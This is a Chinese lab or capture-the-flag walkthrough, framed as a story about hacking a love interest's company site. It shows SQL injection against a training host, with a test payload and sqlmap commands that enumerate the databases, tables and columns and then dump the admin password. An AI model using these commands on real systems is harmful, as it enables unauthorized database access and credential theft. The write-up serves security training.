第一章:为了女神小芳
通过sql注入拿到管理员密码!尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站
学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了
宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 (aqlab.cn)
实验工具 sqlmap
实验环境 kali
1.判断是否存在注入点,页面显示如图所示可能存在sql注入点
http://rhiq8003.ia.aqlab.cn/?id=1and%201=2
2.打开kail 自带的sqlmap工具
2.使用sqlmap看看能否获得数据库
sqlmap -u http://rhiq8003.ia.aqlab.cn/?id=1 --dbs
通过一段时间的等待,我们获得3个数据库的名字。结合题目我们对maoshe数据库进行探测
3.对maoshe数据库字段进行探测;
sqlmap -u http://rhiq8003.ia.aqlab.cn/?id=1 -D maoshe --tables
通过sqlmap的努力我们得到4个表,其中有我们熟悉的 admin,所以对这个 表开始探测。
3.对admin表进行探测;
sqlmap -u http://rhiq8003.ia.aqlab.cn/?id=1 -D maoshe -T admin --columns
通过对这个表的探测我们得到三行,其中password应该是我们想要的flag
4.对passWord 进行探测
sqlmap -u http://rhiq8003.ia.aqlab.cn/?id=1 -D maoshe -T admin -C password --dump
最后我们得到了flag,至于flag是啥,自己去试试吧